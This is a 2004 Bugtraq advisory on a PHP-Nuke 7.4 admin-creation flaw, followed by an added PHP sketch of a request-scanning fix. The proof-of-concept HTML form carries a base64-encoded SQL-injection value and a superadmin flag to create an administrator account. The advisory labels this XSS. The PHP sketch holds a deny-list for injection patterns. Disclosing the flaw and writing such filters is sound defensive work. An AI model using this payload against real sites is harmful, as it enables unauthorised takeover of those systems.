[XSS] PHP-Nuke 7.4 Remote Privilege Escalation

From: Pierquinto Manco (mantra_at_ntj.it)
Date: 09/03/04

    Date: 3 Sep 2004 12:50:59 -0000
    To: bugtraq@securityfocus.com
    
    

    **************************************************************
    * CODEBUG Labs
    * Advisory #1
    * Title: AddAdmin Bug
    * Author: Pierquinto 'Mantra' Manco
    * Product: PHP-Nuke 7.4
    * Type: XSS
    * Web: http://www.mantralab.org [ITALIAN SITE]
    *
    **************************************************************

                    Remote Privilege Escalation

    - ) Description
    PHP-Nuke is a very buggy web CMS; version 7.4 has a critical
    XSS bug that permits an attacker to gain Admin access
    to the system.
    The bug is very old, but we can bypass the patch by sending data
    by POST instead of GET.

    - ) Proof-of-Concept
    Create an HTML file with these lines:

    <form name="mantra" method="POST" action="http://www.sitewithphpnuke.com/admin.php">
      <p>USERNAME:
        <input type="text" name="add_aid">
        <br>
        NOME:
        <input type="text" name="add_name">
        <br>
        PASSWORD:
        <input type="text" name="add_pwd">
        <br>
        E-MAIL:
        <input type="text" name="add_email">
        <br>
        <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
        <br>
        <input type="hidden" name="add_radminsuper" value="1">
        <br>
        <input type="hidden" name="op" value="AddAuthor">
      </p>
      <p>
        <input type="submit" name="Submit" value="Create Admin">
        <br>
      </p>
    </form>

    - ) Patch

    Add a routine to admin.php that checks the GET and POST global
    arrays (maybe COOKIE too).

    **************************************************************
                    http://www.mantralab.org
                      admin@mantralab.org
    **************************************************************
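
The patch advice above, sketched as an added example (not code from the advisory or from PHP-Nuke): one rule applied uniformly to GET, POST and COOKIE, so a request that changes HTTP method is checked the same way. The function names, the pattern list and the assumption that the `admin` field carries base64-encoded data are illustrative.

```php
<?php
// Added example; helper names and rule set are hypothetical, not PHP-Nuke code.

// Assumed deny-list: SQL UNION/comment markers and script tags.
const SUSPECT_PATTERN = '/\bunion\b.+\bselect\b|\/\*|<\s*script\b/is';

/** Return the raw value plus its decoded form when it is valid base64. */
function candidate_forms(string $value): array
{
    $forms = [$value];
    $decoded = base64_decode($value, true); // strict: false on invalid input
    if ($decoded !== false && $decoded !== '') {
        $forms[] = $decoded;
    }
    return $forms;
}

/** Scan one input array (nested values included); return offending keys. */
function scan_source(string $label, array $input): array
{
    $hits = [];
    array_walk_recursive($input, function ($value, $key) use ($label, &$hits) {
        foreach (candidate_forms((string) $value) as $form) {
            if (preg_match(SUSPECT_PATTERN, $form) === 1) {
                $hits[] = sprintf('%s[%s]', $label, $key);
                return; // one hit per key is enough
            }
        }
    });
    return $hits;
}

/** Same rule for every source, so switching the HTTP method changes nothing. */
function scan_request(array $get, array $post, array $cookie): array
{
    return array_merge(
        scan_source('GET', $get),
        scan_source('POST', $post),
        scan_source('COOKIE', $cookie)
    );
}

// Constructed sample: fields of the form above, as they arrive by POST.
$post = [
    'add_aid' => 'newadmin',
    'admin' => 'eCcgVU5JT04gU0VMRUNUIDEvKjox',
    'add_radminsuper' => '1',
    'op' => 'AddAuthor',
];
print_r(scan_request([], $post, []));
```

In admin.php the call would run on `$_GET`, `$_POST` and `$_COOKIE` before any `op` is dispatched, rejecting the request when the returned list is non-empty.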

